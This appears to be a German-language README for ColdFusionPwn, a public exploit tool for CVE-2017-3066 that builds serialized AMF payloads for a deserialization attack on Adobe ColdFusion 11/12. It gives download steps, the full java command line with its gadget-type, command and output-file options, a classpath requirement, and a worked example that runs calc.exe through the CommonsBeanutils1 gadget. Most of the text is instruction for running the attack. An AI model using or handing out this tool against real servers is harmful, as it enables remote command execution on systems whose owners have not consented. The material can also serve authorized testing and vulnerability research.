
Exploit-Tool für CVE-2017-3066, das Adobe Coldfusion 11/12 angreift
Exploitation-Tool für CVE-2017-3066, das Adobe Coldfusion 11/12 angreift.
Das Tool ermöglicht es Ihnen, serialisierte AMF-Payloads zu generieren, um die fehlende Eingabevalidierung erlaubter Klassen auszunutzen. Details finden Sie in unserem Blogbeitrag.
Laden Sie die neueste Version von ysoserial herunter. Laden Sie ColdFusionPwn von den Veröffentlichungen herunter.
java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-master-SNAPSHOT.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner [-s|-e] [payload type] '[command]' [outfile]
- [-s|-e] Setter (CF11) or Externalizable Exploit (CF11/12) technique
- [payload type] ysoserial gadget payload
- [command] command to be executed
- [outfile] output file for the generated payload
Es ist erforderlich, dass ColdFusionPwn-0.0.1-SNAPSHOT-all.jar als erster Eintrag im Classpath steht, da die mit ysoserial gelieferte ApacheCommons BeanUtils-Bibliothek neuer ist (und eine andere serialversion uid hat).
java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-master-SNAPSHOT.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 calc.exe /tmp/out.amf